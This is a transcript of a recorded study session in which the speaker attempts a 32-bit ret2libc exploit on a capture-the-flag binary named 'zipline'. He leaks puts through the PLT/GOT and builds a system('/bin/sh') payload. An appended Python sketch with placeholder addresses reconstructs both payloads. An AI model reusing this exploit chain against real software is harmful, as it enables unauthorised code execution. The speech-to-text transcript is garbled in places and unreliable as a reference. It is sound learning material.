All right. >> So this may or may not work and so I might trash this video, but I just got it in my head that I finally understand what this write-up is trying to do. And so I totally want to give it a try because the technique they use is really, really clever. >> So basically what you're trying to do every time you run a program like this. >> So I want to do, sorry, I'm going to do thunder leap-frog, but it's actually called zipline. >> And any ideas that you call a whole bunch of functions and stuff and use those function calls to other things. >> But this person did something very, very clever and it taught me a whole lot, I think, but I haven't done it before, so I will just give it a try. >> So first, I guess, just recording: from pwn import *, e = ELF. >> I don't think it's e = ELF dot what? >> So this GOT and PLT. So this is what I wanted to mess with. >> These are the functions that are used from the library, the standard C library. >> And they have a local offset. >> And so I wanted to say puts_plt equals that. >> And then they have an address in the global offset library. >> So I'm gonna say puts_got equals that, right? >> And this guide helps you see it. So basically when there's going to be a system call, there's basically a caching process used. >> They're not loading the entire library in. What they do is they have this, this is the global offset table. And you can see that some of these addresses are actual legitimate C library addresses, but some of them are just the offsets inside the program itself. When it goes to do this lookup, since it's not done the lookup before, it's going to do a quick run through whatever this is to adjust from the start main position to the puts position or whatever it is that it's going to look up.
So for a lot of these common functions, it's not going to know the address of them until call time because it wants to randomize the address of this every time it runs in order to prevent people like us from getting a leg up. >> Okay, great. >> But if I can get a stack overflow, then I can get around that. All right, if I can stack smash, I can get around that. So this is going to be the address: puts will be in that global offset table, which early on has the bad address, but once it's been called, it'll have the good address. >> So what this person did is they got the offset and then they make a call to the PLT function that's going to load it into the GOT address. >> Then they go back to the beginning of the program and they call it. And I think if we do this right, we should leak the address of puts in this thing, which means that this offset you just look up on the internet will just be true. So I just wanted to try that, right? >> So p = process('zipline') and I'm going to sendline 'a' times 22 plus what I think I want to put in, the 32-bit address of the PLT. >> I'm not totally sure why, I do know why this is going to be. I want to go there and this command is going to load puts into the GOT guy. Then in the way that 32-bit architectures work, and this is the last video we did, and it's actually what this leapfrogging one is about, and we definitely did in callme32: I'm going to put the address I want to call next, then the address to go to after this, then the arguments to that address. So this will be at the end, I want to go to zipline. Oh, I didn't look up, or I wonder if I can search in here. >> How about I just type in S and ten? >> No, it doesn't look like search finds it. No. >> Okay, hold that thought. Let's dump this on k here, let's say, or objdump -S zipline. See, this is global local call.
>> These are all the things you're supposed to be doing, which this clearly cuts right around, which is just super slick. >> So thank you, whoever you are. I think that's the address I want. >> I should probably also get the zipline address. And then this is the win function address. Actually, I don't care about the win function, because in order to get the win function to do something, all these other objects, and I'm trying to avoid all that. >> Okay? >> So p.sendline('a' times 32 plus p32(puts_plt) plus p32(this address)). >> So that we'll be back to the beginning of the main function. Then we'll put p32(puts_got). >> And I just want to send that required argument, so that'll do. So start the process, area circle. >> Okay, the output goes, that sets a new line. >> So I think I can now look up what we had for puts_got before, but now I bet it won't be different. >> It won't be different because that was a lookup a priori. Great, I just have to figure out how to read the address. Maybe that is the address: F7 T6 9004. That looks like an address. It's putting all sorts of stuff down here, I think. Some four bytes of that is the address of puts. And it is now my job. So let's see, let's go get the right one. You leak, make_unpacker(32, endian) byte for byte value, u 04. So the first four bytes. >> So, oh, he's done it again. >> Let's try that again. >> sendline, I think what I'll do is receive one. >> Okay? >> And this is now different. What did I get before? Before I had the output up to the semicolon was the same, and then it's sort of been a little different. But the F7 F7, is that 1234? I think it looks like the F7 A6 before. It might be my winter. >> I don't know. >> I'm smart enough to figure that out without arena that I will be soon. Oh my gosh. >> Four through eight. >> Taiwan. There. >> Oh, well, maybe it is the first four, and F7 goes the other way.
And that's why they've got the endian characters. >> So what was the, this is a pwntools function, make_unpacker(32, endian='little', sign='unsigned'). >> Maybe glibc start will equal o. >> I called that puts offset, but I was totally wrong. That's the actual puts address. >> Puts offset is just well known. And then that means that the call, so the syscall or whatever, I could do whatever I want now. Okay, but I'll trust these two also, visit us, see factoids, setting that address as a call. It's going to be glibc start plus system offset, and /bin/sh as a thing will be glibc start plus binsh offset. >> And I'm like, the process should be running again. And so I think what I can do is put in a CIF address, career-related, I don't think this should matter. I think this is just junk that goes here. Yes, correct. >> That is this, followed by /bin/sh. All right. >> p.interactive(). >> I failed, I failed, I failed, but I failed. >> Oh, I know why I failed. I read the wrong address. I restarted all this stuff, and no problem. >> No problem. >> Okay, so let's do this one more time. >> We're going to get this mother: sendline, puts, puts, puts, do recvline, which will be the first line, and then we'll receive it again. >> And we'll call this the leaked address. >> And I think that address, first four, should be, yep, there's my seven, sets. I feel good about that. And then we had this make_unpacker, which we can do to address[:4]. So that is puts address equals that. And then we had the glibc start is puts address minus that. >> And then finally, this address is that, /bin/sh address is that, p.sendline, p.interactive. Oh, no, no. Okay. All right. All right. >> I'm going to copy and paste this, we'll see, some raw. >> I'm not sure what, but I do feel good about this business here.
>> Yeah, these tools to find p = process('zipline'), going okay with this system on my computer, and on my computer and copy and pasting, it'll feel great about it. Said this doesn't feel right to me. Yeah. Well, okay. That's fine. >> We just define, do all of these things. Yeah, that looks like an address way back there. >> Now, I think I followed this directly and it didn't work. >> So I'll stop. I'll share my failed attempt here. Share my failed attempt and maybe somebody can help me figure out where I should go. Do bedtime now, and thanks. >> Okay.
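The two payloads the video assembles and the leak parsing it struggles with, as an added example that is not code from the video or the zipline challenge. It uses struct in place of pwntools' p32/u32 so it runs with no target binary, and every address, offset and padding length is a constructed placeholder, not a value read from zipline or from a real libc.

```python
import struct

# Constructed placeholders standing in for what the video reads off the binary
# and a libc symbol lookup; they are NOT the real zipline or libc numbers.
PAD_LEN = 32                # bytes from the buffer to the saved return address
PUTS_PLT = 0x08048340       # puts@plt stub inside the binary
PUTS_GOT = 0x0804a018       # puts entry in the global offset table
MAIN_ADDR = 0x080484c0      # start of main, to get a second overflow
PUTS_OFFSET = 0x00067b40    # puts minus libc base, from the libc build
SYSTEM_OFFSET = 0x0003d200  # system minus libc base
BINSH_OFFSET = 0x0017e0cf   # "/bin/sh" string minus libc base


def p32(value):
    """Pack an address as 4 little-endian bytes (what pwntools' p32 does)."""
    return struct.pack("<I", value)


def u32(data):
    """Unpack 4 little-endian bytes into an int (what pwntools' u32 does)."""
    return struct.unpack("<I", data[:4])[0]


def leak_payload():
    """32-bit cdecl chain: return into puts@plt, then into main, with puts@got
    as the argument. puts prints its own resolved GOT entry; main runs again."""
    return b"a" * PAD_LEN + p32(PUTS_PLT) + p32(MAIN_ADDR) + p32(PUTS_GOT)


def parse_leak(line):
    """The first 4 bytes puts writes are the GOT entry: the live puts address."""
    return u32(line[:4])


def libc_addresses(leaked_puts):
    """Derive libc base, system and "/bin/sh" from the leak and known offsets."""
    base = leaked_puts - PUTS_OFFSET
    return {"base": base, "system": base + SYSTEM_OFFSET, "binsh": base + BINSH_OFFSET}


def shell_payload(addrs):
    """Second overflow: system, a junk return address, then "/bin/sh" as argument."""
    return b"a" * PAD_LEN + p32(addrs["system"]) + b"JUNK" + p32(addrs["binsh"])


# Constructed sample of the leak line: the 4 GOT bytes (here 0xf7e17b40) followed
# by whatever puts keeps reading up to a NUL, the part that caused the confusion.
SAMPLE_LEAK_LINE = p32(0xF7E17B40) + b"\x10\xa0\x04\x08"

if __name__ == "__main__":
    addrs = libc_addresses(parse_leak(SAMPLE_LEAK_LINE))
    print({k: hex(v) for k, v in addrs.items()})
```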
Andy Novocin's Personal Meeting Room
From Andrew Novocin March 19, 2020